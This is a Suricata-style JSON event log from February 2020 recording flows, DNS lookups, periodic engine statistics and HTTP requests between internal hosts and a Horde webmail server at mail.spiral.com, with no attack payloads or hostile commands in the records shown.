{"timestamp":"2020-02-29T00:20:18.001075+0000","flow_id":745974314004663,"event_type":"flow","src_ip":"192.168.10.130","src_port":34882,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":10,"bytes_toserver":1862,"bytes_toclient":6621,"start":"2020-02-29T00:19:11.618679+0000","end":"2020-02-29T00:19:17.006675+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:20.000363+0000","event_type":"stats","stats":{"uptime":14872,"capture":{"kernel_packets":137308,"kernel_drops":0},"decoder":{"pkts":137317,"bytes":94179587,"invalid":192,"ipv4":135774,"ipv6":10,"ethernet":137317,"raw":0,"null":0,"sll":0,"tcp":130285,"udp":5282,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2835,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2851,"synack":2842,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1871,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2418,"failed_udp":112},"tx":{"http":4797,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2500}},"flow_mgr":{"closed_pruned":2804,"new_pruned":17,"est_pruned":2473,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19840,"memcap_state":0,"memcap_global":0},"http":{"memuse":88884,"memcap":0}}} {"timestamp":"2020-02-29T00:20:21.601070+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62216,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:21.634801+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:20:21.712317+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60597,"proto":"UDP","dns":{"type":"answer","id":62216,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:21.712317+0000","flow_id":412190935165934,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60597,"proto":"UDP","dns":{"type":"answer","id":62216,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:21.808452+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5314}} {"timestamp":"2020-02-29T00:20:21.899880+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5314},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":5}} {"timestamp":"2020-02-29T00:20:21.902229+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52924,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:20:21.987567+0000","flow_id":345374128613512,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52926,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":2}} {"timestamp":"2020-02-29T00:20:26.000487+0000","flow_id":500671536956992,"event_type":"flow","src_ip":"192.168.10.122","src_port":34200,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:15:24.919104+0000","end":"2020-02-29T00:15:25.027922+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:26.906231+0000","flow_id":600409286444339,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52924,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":6}} {"timestamp":"2020-02-29T00:20:27.000216+0000","event_type":"stats","stats":{"uptime":14879,"capture":{"kernel_packets":137323,"kernel_drops":0},"decoder":{"pkts":137344,"bytes":94189208,"invalid":192,"ipv4":135797,"ipv6":10,"ethernet":137344,"raw":0,"null":0,"sll":0,"tcp":130306,"udp":5284,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2835,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2851,"synack":2842,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1871,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2419,"failed_udp":112},"tx":{"http":4799,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2501}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2473,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19840,"memcap_state":0,"memcap_global":0},"http":{"memuse":19654,"memcap":0}}} {"timestamp":"2020-02-29T00:20:28.000592+0000","flow_id":816909979187263,"event_type":"flow","src_ip":"192.168.10.122","src_port":58159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:15:27.489535+0000","end":"2020-02-29T00:15:27.598059+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:31.635589+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23772,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:31.746740+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35430,"proto":"UDP","dns":{"type":"answer","id":23772,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:31.746740+0000","flow_id":210589465948869,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35430,"proto":"UDP","dns":{"type":"answer","id":23772,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:31.841937+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49402,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26439,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:31.872860+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:20:31.892012+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52934,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5411}} {"timestamp":"2020-02-29T00:20:31.950688+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49402,"proto":"UDP","dns":{"type":"answer","id":26439,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:31.950688+0000","flow_id":2045171861543121,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49402,"proto":"UDP","dns":{"type":"answer","id":26439,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:34.000209+0000","event_type":"stats","stats":{"uptime":14886,"capture":{"kernel_packets":137355,"kernel_drops":0},"decoder":{"pkts":137371,"bytes":94199869,"invalid":193,"ipv4":135824,"ipv6":10,"ethernet":137371,"raw":0,"null":0,"sll":0,"tcp":130328,"udp":5288,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2837,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2853,"synack":2844,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1872,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2421,"failed_udp":112},"tx":{"http":4800,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2503}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2475,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20171,"memcap_state":0,"memcap_global":0},"http":{"memuse":75698,"memcap":0}}} {"timestamp":"2020-02-29T00:20:36.893668+0000","flow_id":996559891170365,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52934,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5411},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:20:39.164889+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54649,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":51815,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:39.276286+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54649,"proto":"UDP","dns":{"type":"answer","id":51815,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:39.276286+0000","flow_id":473329795826713,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54649,"proto":"UDP","dns":{"type":"answer","id":51815,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:39.420033+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:20:39.441359+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52936,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5416}} {"timestamp":"2020-02-29T00:20:41.000209+0000","event_type":"stats","stats":{"uptime":14893,"capture":{"kernel_packets":137381,"kernel_drops":0},"decoder":{"pkts":137395,"bytes":94208142,"invalid":193,"ipv4":135848,"ipv6":10,"ethernet":137395,"raw":0,"null":0,"sll":0,"tcp":130350,"udp":5290,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2838,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2854,"synack":2845,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1873,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2422,"failed_udp":112},"tx":{"http":4801,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2504}},"flow_mgr":{"closed_pruned":2806,"new_pruned":17,"est_pruned":2475,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20501,"memcap_state":0,"memcap_global":0},"http":{"memuse":75756,"memcap":0}}} {"timestamp":"2020-02-29T00:20:41.470817+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37012,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":63665,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:41.579975+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37012,"proto":"UDP","dns":{"type":"answer","id":63665,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:41.579975+0000","flow_id":1649433575501601,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37012,"proto":"UDP","dns":{"type":"answer","id":63665,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:41.735561+0000","flow_id":1207103483610682,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34896,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7417}} {"timestamp":"2020-02-29T00:20:43.000190+0000","flow_id":708895863071501,"event_type":"flow","src_ip":"192.168.10.81","src_port":52906,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1838,"bytes_toclient":6314,"start":"2020-02-29T00:19:37.451341+0000","end":"2020-02-29T00:19:42.475356+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000412+0000","flow_id":1590540979789703,"event_type":"flow","src_ip":"192.168.10.81","src_port":52902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":7,"bytes_toserver":1283,"bytes_toclient":2382,"start":"2020-02-29T00:19:37.450439+0000","end":"2020-02-29T00:19:42.475231+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000708+0000","flow_id":1179362285679512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":14,"bytes_toserver":1678,"bytes_toclient":13124,"start":"2020-02-29T00:19:37.291736+0000","end":"2020-02-29T00:19:42.475450+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.000952+0000","flow_id":1498976572011859,"event_type":"flow","src_ip":"192.168.10.81","src_port":52908,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":752,"bytes_toclient":1678,"start":"2020-02-29T00:19:37.456019+0000","end":"2020-02-29T00:19:42.466796+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:43.001168+0000","flow_id":2243994484072541,"event_type":"flow","src_ip":"192.168.10.81","src_port":52904,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":35,"pkts_toclient":40,"bytes_toserver":3529,"bytes_toclient":50594,"start":"2020-02-29T00:19:37.450653+0000","end":"2020-02-29T00:19:42.622817+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:20:44.442565+0000","flow_id":446177012569860,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52936,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5416},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:20:45.000733+0000","flow_id":1508751902266416,"event_type":"flow","src_ip":"192.168.10.122","src_port":59127,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:15:44.873520+0000","end":"2020-02-29T00:15:44.982402+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:20:46.736224+0000","flow_id":1207103483610682,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34896,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7417},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":36246,"tx_id":0}} {"timestamp":"2020-02-29T00:20:47.794898+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49212,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49707,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:20:47.903724+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49212,"proto":"UDP","dns":{"type":"answer","id":49707,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:20:47.903724+0000","flow_id":193285043724562,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49212,"proto":"UDP","dns":{"type":"answer","id":49707,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:20:47.972110+0000","flow_id":2182554981492520,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34898,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8380}} 